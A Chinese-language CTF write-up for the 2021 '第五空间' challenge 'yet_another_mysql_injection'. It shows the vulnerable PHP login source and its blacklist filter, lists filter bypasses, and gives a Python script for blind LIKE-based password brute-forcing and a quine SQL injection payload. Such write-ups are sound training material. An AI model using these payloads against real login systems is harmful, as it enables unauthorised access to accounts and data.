[第五空间 2021]yet_another_mysql_injection

[第五空间 2021]yet_another_mysql_injection

F12查看源代码发现 ?source提示,

<?php
include_once("lib.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}

function checkSql($s) {
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}

if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
    $username=$_POST['username'];
    $password=$_POST['password'];
    if ($username !== 'admin') {
        alertMes('only admin can login', 'index.php');
    }
    checkSql($password);
    $sql="SELECT password FROM users WHERE username='admin' and password='$password';";
    $user_result=mysqli_query($con,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes("something wrong",'index.php');
    }
    if ($row['password'] === $password) {
        die($FLAG);
    } else {
    alertMes("wrong password",'index.php');
  }
}

if(isset($_GET['source'])){
  show_source(__FILE__);
  die;
}
?>

法一

checkSql()函数分析

sleep 可以用benchmark代替
<,> 可以用least(),greatest()代替
=,in 可以用like代替
substr 可以用mid代替
空格 可以用/**/代替

通过代码可以发现其实FLAG并不在数据库中，可以通过LIKE尝试爆破密码

脚本编写能力比较差，跟着WP写的

import requests
import time

char = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/*-+?~#!@&%'


def password():
    flag = ''
    url = 'http://1.14.71.254:28632/index.php'
    while True:
        for i in char:
            payload = {"username": "admin", "password": f"1'or/**/password/**/like/**/'{flag + i}%'#"}
            res = requests.post(url=url, data=payload)
            time.sleep(0.1)
            if "something wrong" not in res.text:
                flag += i
                print(flag)
                break
            if "NSSCTF" in res.text:
                break
            elif "~" in i:
                return




if __name__ == '__main__':
    password()

法二

在看WP时候发现了一种新玩法，因为最后比较结果一样就可以Bypass

参考的是这位大佬的博客，核心思想就是通过REPLACE替换套娃，让输入和输出结果一样，也就是构造

Quine程序

CTFHub_2021-第五空间智能安全大赛-Web-yet_another_mysql_injection（quine注入） - zhengna - 博客园 (cnblogs.com)

1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#